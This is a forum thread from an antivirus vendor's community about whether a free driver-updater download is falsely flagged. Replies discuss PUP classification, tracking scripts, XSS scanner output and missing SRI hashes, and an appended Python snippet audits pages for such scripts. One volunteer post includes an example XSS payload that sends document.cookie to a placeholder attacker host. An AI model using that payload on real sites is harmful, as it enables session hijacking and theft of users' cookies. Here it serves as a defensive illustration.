Author Topic: Free Driver Scout false positive?  (Read 8141 times)

Offline RejZoR

  • Polymorphic Sheep
  • Serious Graphoman
  • *****
  • Posts: 9406
  • We are supersheep, resistance is futile!
    • RejZoR's Flock of Sheep
Free Driver Scout false positive?
« on: May 25, 2016, 08:24:06 PM »
http://freedriverscout.com

Getting detected as Win32:Adware-gen [Adw]. Even without PUP enabled. Is this correct?
Visit my webpage Angry Sheep Blog

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not a avast user
« Last Edit: May 25, 2016, 11:44:03 PM by Pondus »

Offline RejZoR

Re: Free Driver Scout false positive?
« Reply #2 on: May 25, 2016, 09:39:32 PM »
It was highly praised by PC Support webpage: http://pcsupport.about.com/od/driversites/tp/free-driver-updater-tools.htm

I tried Driver Booster and I quite like it. Now I've wanted to try this one and it was stopped by avast!...

Offline Eddy

  • Avast Evangelist
  • Maybe Bot
  • ***
  • Posts: 31080
  • Watching (over?) you
    • Malware removal, Biljart and other things.
Re: Free Driver Scout false positive?
« Reply #3 on: May 25, 2016, 10:21:31 PM »
The real question is if you need such a tool.

Is there a need to have the latest drivers installed?
Normally not, but there are exceptions of course.
e.g.
If the new ones fix a security flaw. (for instance if you use a printer through wifi)
If the new ones fix a bug that is making your hardware not work properly.

And why use a 3rd party tool for it?
They don't have a database for the millions of different hardware that exist.
Manufacturers' websites have the newest drivers before those tools have them listed.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88900
  • No support PMs thanks
Re: Free Driver Scout false positive?
« Reply #4 on: May 26, 2016, 12:16:57 AM »
It matters not if you need such a thing, only that you want to use/try it and it is being blocked.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline savcin

  • Avast team
  • Full Member
  • *
  • Posts: 113
Re: Free Driver Scout false positive?
« Reply #5 on: May 26, 2016, 03:55:21 PM »
Detection has been changed to PUP.

Offline RejZoR

Re: Free Driver Scout false positive?
« Reply #6 on: May 26, 2016, 05:03:29 PM »
It is when you have to reinstall a device like a Windows tablet and you don't have the slightest clue what all those weird PCI controllers are and there is no centralized driver download like for regular motherboards. But with tools like this, everything gets detected and installed properly. Without these tools I'd never get it working properly.

EDIT:
It's still being detected exactly the same as before. Where was it moved to PUP detection? Looks the same for me...

Offline Lord_Ami

  • Sr. Member
  • ****
  • Posts: 227
Re: Free Driver Scout false positive?
« Reply #7 on: May 26, 2016, 10:21:16 PM »
For issues like this I'd suggest
https://sdi-tool.org/
Yes, it's big, but it does its job very well (used it myself many times).

Offline Lotan

  • Sr. Member
  • ****
  • Posts: 289
Re: Free Driver Scout false positive?
« Reply #8 on: May 26, 2016, 11:48:08 PM »
I just stick with IObit's Driver Booster. It gets the job done.

Offline RejZoR

Re: Free Driver Scout false positive?
« Reply #9 on: May 27, 2016, 11:03:36 AM »
So, what is with this file? Is it a false positive or a genuine detection?

Offline Be Secure

  • Long Time Avast User(10years.....) Security Enthusiast.
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1908
Re: Free Driver Scout false positive?
« Reply #10 on: May 27, 2016, 11:12:08 AM »
It is a PUP. A genuine detection for sure.
PC- Windows10 EDU 64Bit,avast! free 21.1.2449,uBlock Origin,NVT_OSA,GoogleChrome(64bit),CCleaner,Unchecky,ZAM Free,Shadow Defender.
Security Enthusiast

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Free Driver Scout false positive?
« Reply #11 on: May 27, 2016, 12:47:50 PM »
Hi RejZoR,

When you see what is running at that site: http://retire.insecurity.today/#!/scan/60fc1c974bfdf490c2c49eb8c19231fceeae8d410bc8adf5544c38ac780280e3
and you know what to block and intend to willingly download the potentially unwanted software,
because you are fully aware of any risks involved, then there is no risk downloading the tool.
Nothing to hold you back.

Script blockers block some of the third party code running on that website like: -http://dmp.theadex.com/d/105/21/s/adex.js
and -http://beacon-4.newrelic.com/1/26cb0a7878?  and -http://js-agent.newrelic.com/nr-100.js
Well, a developer of free tools has to make an income of sorts somewhere, so tracking scripts galore on such a page,
resulting in that PUP alert.

Just see where this lands for instance: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fjs-agent.newrelic.com%2Fnr-100.js

The code error next to the XSS sources and sinks:
Code:
detected] script
     info: [decodingLevel=0] found JavaScript
     error: line:3: SyntaxError: missing ; before statement:
          error: line:3: ar NR_QUEUE=[];"undefined"!=typeof window.NREUMQ?NR_QUEUE=NREUMQ:"undefined"!=typeof window.EPISODES?NR_QUEUE=EPISODES.q:"undefined"!=typeof window.NREUM&&(NR_QUEUE=NREUM.q);var NREUM=NREUM||{};NREUM.q=NR_QUEUE,NREUM.targetOrigin=[i]document.location.protoco[/i]
          error: line:3: ^
New Relic Google Episodes code that comes shared on the webs. Exceptions should be mitigated by re-copying for errors.

So whenever you use free tools today you pay with some of your privacy and meta-data, it always comes at a price that you should be willing to pay or you should block what should be blocked at such a page.

Non-persistent cross-site-scripting attacks are possible here, depending on where code has access,
and could be performed via an attack like for instance
 
Code:
<SCRIPT>
document.location='http://site.pirate/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>
.
Just to give an example for document.location.protoco  -> document.location.href)+"&p="+NREUM.sHash(document.referrer)
and indeed there is room for insecurity for scripts running on the site, see: https://sritest.io/#report/0cddf512-ac4d-4005-b3da-5be611dfeb93

See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fcdn.optimizely.com%2Fjs%2F507870057.js  SRI hash missing
and Results from scanning URL: http://cdn.optimizely.com/js/507870057.js
Number of sources found: 103
Number of sinks found: 42

Could be a good idea to profoundly security test all the code on that website,
but i.m.h.o. there are no immediate malware threats, neither from the site nor from that tool,
better security could be implemented though, just be aware of the complicated code chain error consequences.
All works through on the general website's security infrastructure.

Have a nice day,

polonus (volunteer website security analyst and website error-hunter)



Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
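
Added example, not part of the thread or any poster's code: a small audit of the two weaknesses the last post points at, third-party scripts loaded over plain http and script tags without an SRI hash. The sample HTML is constructed (only the two tracker URLs and the site host are taken from the thread); `audit` and `sri_value` are hypothetical helper names.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page. The first two script URLs are quoted in the thread;
# cdn.example.test and its integrity value are placeholders.
SAMPLE_HTML = """
<html><head>
<script src="http://dmp.theadex.com/d/105/21/s/adex.js"></script>
<script src="http://js-agent.newrelic.com/nr-100.js"></script>
<script src="https://cdn.example.test/lib.js"
        integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script src="/js/site.js"></script>
<script>var inline = 1;</script>
</head></html>
"""

class ScriptAudit(HTMLParser):
    """Collects external scripts that are cross-origin and weakly protected."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        attr = dict(attrs)
        src = attr.get("src")
        if not src:
            return  # inline script: SRI does not apply
        url = urlparse(src)
        if url.hostname is None or url.hostname == self.page_host:
            return  # relative or same-host URL: first-party code
        issues = []
        if url.scheme == "http":
            issues.append("plain-http")  # can be modified in transit
        if not attr.get("integrity"):
            issues.append("no-sri")      # browser cannot verify the content
        if issues:
            self.findings.append((src, issues))

def audit(html, page_host):
    parser = ScriptAudit(page_host)
    parser.feed(html)
    return parser.findings

def sri_value(content: bytes) -> str:
    """integrity="..." value for a script body that is pinned to one version."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode()
```

SRI only helps for files whose content does not change; a vendor script that is updated in place under the same URL has to be self-hosted or version-pinned before a hash can be attached.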